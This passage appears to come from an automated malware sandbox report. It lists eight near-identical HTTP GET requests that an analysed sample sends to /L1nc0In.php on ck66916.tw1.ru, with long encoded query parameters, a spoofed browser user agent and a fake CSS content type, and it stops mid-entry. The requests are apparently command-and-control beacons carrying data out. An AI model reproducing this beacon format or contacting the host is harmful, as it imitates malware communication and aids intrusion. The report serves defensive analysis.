                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1